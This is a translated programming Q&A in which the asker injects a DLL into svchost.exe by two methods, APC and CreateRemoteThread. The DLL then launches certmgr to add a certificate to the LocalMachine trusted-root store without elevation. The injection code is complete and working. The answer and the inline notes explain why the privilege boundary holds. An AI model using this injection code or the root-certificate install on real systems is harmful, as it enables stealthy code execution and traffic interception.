不幸的是,我在向svchost注入DLL时遇到了问题。代码看起来像这样:
#include "Injection.h"
#pragma once
#include <Windows.h>
// DLLInjection: default constructor. No members are initialised here; the
// class only groups the injection routine below.
DLLInjection::DLLInjection()
{
}
// InjectDLLTosvchost: starts a brand-new svchost.exe from the injector's own
// context (CREATE_SUSPENDED), copies the DLL path into that child and queues
// an APC so the child's initial thread calls LoadLibraryA(dllPath) once it is
// resumed, followed by ExitThread(0).
//
// NOTE(review): by design, a process created with CreateProcess runs under
// the creator's access token, so this child has exactly the rights of the
// injector - naming the image svchost.exe does not elevate it. That is why
// the certmgr call in the question still fails on this path.
//
// From a defender's viewpoint the sequence below (suspended child, then
// cross-process VirtualAllocEx/WriteProcessMemory, then QueueUserAPC on the
// child's thread) is a well-known process-injection pattern that endpoint
// monitoring should alert on.
void DLLInjection::InjectDLLTosvchost(LPSTR dllPath)
{
STARTUPINFO si = {};
PROCESS_INFORMATION pi = {};
HMODULE k32 = GetModuleHandle("kernel32.dll");
CreateProcess(NULL, "svchost.exe", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
// A fixed 260-byte buffer is allocated in the child and 260 bytes are copied
// from dllPath regardless of the string's actual length.
HANDLE mem = VirtualAllocEx(pi.hProcess, NULL, 260, MEM_COMMIT | MEM_RESERVE , PAGE_READWRITE);
WriteProcessMemory(pi.hProcess, mem, dllPath, 260, NULL);
// APC #1: LoadLibraryA(mem) runs on the initial thread when it is resumed;
// APC #2: ExitThread(0) ends that thread afterwards.
QueueUserAPC((PAPCFUNC)GetProcAddress(k32, "LoadLibraryA"), pi.hThread, (ULONG_PTR)mem);
QueueUserAPC((PAPCFUNC)GetProcAddress(k32, "ExitThread"), pi.hThread, 0);
ResumeThread(pi.hThread);
// The injector keeps no handle to the child after this point.
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
// ~DLLInjection: destructor. Nothing to release - the process/thread handles
// are closed inside InjectDLLTosvchost itself.
DLLInjection::~DLLInjection()
{
}
被注入并执行的DLL看起来像这样:
#pragma once
#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>
#include "funkcje.h"
#include <iostream>
#include <shellapi.h>
#include <windows.h>
#include <tchar.h>
using namespace std;
// Hello: the routine the question says runs from the DLL's DllMain. It shows
// a message box, launches certmgr.exe with a hard-coded command line that
// adds a hard-coded .crt file to the LocalMachine "root" store, reports the
// launch result on stdout, then shows a second message box.
//
// Security note: adding a certificate to the machine-wide trusted-root store
// is a privileged, high-impact change. The question reports that it only
// succeeds when the host process is already running elevated; that is the
// OS permission model working as intended, not a defect in this function.
void Hello()
{
MessageBox(NULL, (LPCWSTR)L"poczatkowy messagebox", (LPCWSTR)L"Tytul messagebox", MB_ICONINFORMATION);
// The command line is a constant; sprintf only copies it into bufor.
char bufor[512];
sprintf(bufor, " -add -all -c \"c:\\Users\\Damian\\Desktop\\wwwtesthttpdev.crt\" -s -r LocalMachine root");
// Widen to wchar_t; strlen + 1 so the terminator is converted as well.
wchar_t bufor2[200];
mbstowcs(bufor2, bufor, strlen(bufor) + 1);
// NOTE(review): presumably built with UNICODE (wide literals are used), so
// this maps to CreateProcessW, whose command-line argument must be a
// writable buffer - hence the pointer to bufor2 rather than a literal.
LPWSTR ptr = bufor2;
STARTUPINFO startInfo = { 0 };
PROCESS_INFORMATION processInfo = { 0 };
BOOL bSucces = CreateProcess((LPWSTR)(L"c:\\Program Files\\Microsoft SDKs\\Windows\\v7.1A\\Bin\\certmgr.exe"), ptr, NULL, NULL, 0, 0, NULL, NULL, &startInfo, &processInfo);
if (bSucces)
{
cout << "Process Started" << endl
<< "Process ID: " << processInfo.dwProcessId << endl;
}
else
{
// GetLastError() carries the Win32 reason (e.g. access denied) when the
// launch itself fails; a launch that succeeds but whose child fails is
// not detected here, since the child's exit code is never read.
cout << "Error to start a process " << GetLastError() << endl;
}
MessageBox(NULL, (LPCWSTR)L"koncowy messagebox", (LPCWSTR)L"Tytul messagebox", MB_ICONINFORMATION);
// Blocks until input arrives on stdin (presumably to keep a console open).
cin.get();
}
并且DLL加载正常,因为我确实看到了两个消息框(一个在执行CreateProcess之前,一个在之后),但问题是我没有足够的权限来启动certmgr.exe命令(它返回certmgr执行不成功的消息)。如果我以管理员权限打开程序,一切正常,但它本不应该这样工作。我试图注入svchost进程,因为该进程应当具有管理员权限,但尽管如此我仍然没有相应的权限。有人能告诉我,如何让在DllMain中执行的函数获得管理员权限吗?先感谢您!! the error with certmgr
我也试过OpenProcess:
// InjectDll: CreateRemoteThread/LoadLibraryA injection into an existing
// process identified by PID. Opens the target with PROCESS_ALL_ACCESS, writes
// dllName into a remote buffer, runs LoadLibraryA(remote buffer) on a new
// remote thread, releases the buffer, then runs FreeLibrary on a second
// remote thread. Returns false only when the OpenProcess result equals
// INVALID_HANDLE_VALUE or WriteProcessMemory fails; true otherwise (the
// outcome of the remote LoadLibraryA call itself is not reported).
//
// NOTE(review): opening a process owned by another account (e.g. a
// SYSTEM-owned svchost) or one running at a higher integrity level with
// PROCESS_ALL_ACCESS requires the caller to already hold matching
// privileges; from an unelevated process the request is refused. That
// access check is the security boundary, so this path cannot be used to
// *gain* rights - consistent with the question's "it also does not work".
bool Process::InjectDll(char * dllName, unsigned int processID)
{
HANDLE pHandle = OpenProcess(PROCESS_ALL_ACCESS, false, processID);
if (pHandle == INVALID_HANDLE_VALUE)
return false;
// Remote buffer sized to strlen(dllName) bytes, and exactly that many
// bytes are written.
void * address = VirtualAllocEx(pHandle, NULL, strlen(dllName), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!WriteProcessMemory(pHandle, address, (LPVOID)dllName, strlen(dllName), NULL))
return false;
HMODULE hK32 = GetModuleHandle("Kernel32");
// Remote thread 1: LoadLibraryA(address). Waited on, and its exit code is
// stored in dllAddress (a 32-bit DWORD).
HANDLE tHandle = CreateRemoteThread(pHandle, NULL, 0,
(LPTHREAD_START_ROUTINE)GetProcAddress(hK32, "LoadLibraryA"),
address, 0, NULL);
WaitForSingleObject(tHandle, INFINITE);
DWORD dllAddress;
GetExitCodeThread(tHandle, &dllAddress);
CloseHandle(tHandle);
VirtualFreeEx(pHandle, address, 0, MEM_RELEASE);
// Remote thread 2: FreeLibrary; also waited on before returning.
tHandle = CreateRemoteThread(pHandle, NULL, 0,
(LPTHREAD_START_ROUTINE)GetProcAddress(hK32, "FreeLibrary"), (void*
)&dllAddress, 0, NULL);
WaitForSingleObject(tHandle, INFINITE);
CloseHandle(tHandle);
// pHandle is not closed on any path.
return true;
}
但它也不起作用
答案 0 :(得分:0)
使用CreateProcess时,您是在用默认安全描述符运行svchost的另一个实例(引自MSDN):「如果lpProcessAttributes为NULL或lpSecurityDescriptor为NULL,则进程获取默认安全描述符。」新进程还会继承创建者的访问令牌,因此它的权限与注入程序本身相同,不会因为映像名为svchost.exe而获得提升;这些权限似乎不足以运行certmgr。
相反,如果您的注入程序使用OpenProcess并注入到一个已经提升权限的svchost实例中,您就可以运行certmgr。不过要注意,打开一个已提升的进程并向其写入内存,本身就要求调用方已经拥有至少同等的权限;未提升的进程尝试这样做会被拒绝访问,这正是系统设计上的安全边界,因此这种做法并不能绕过管理员权限的要求。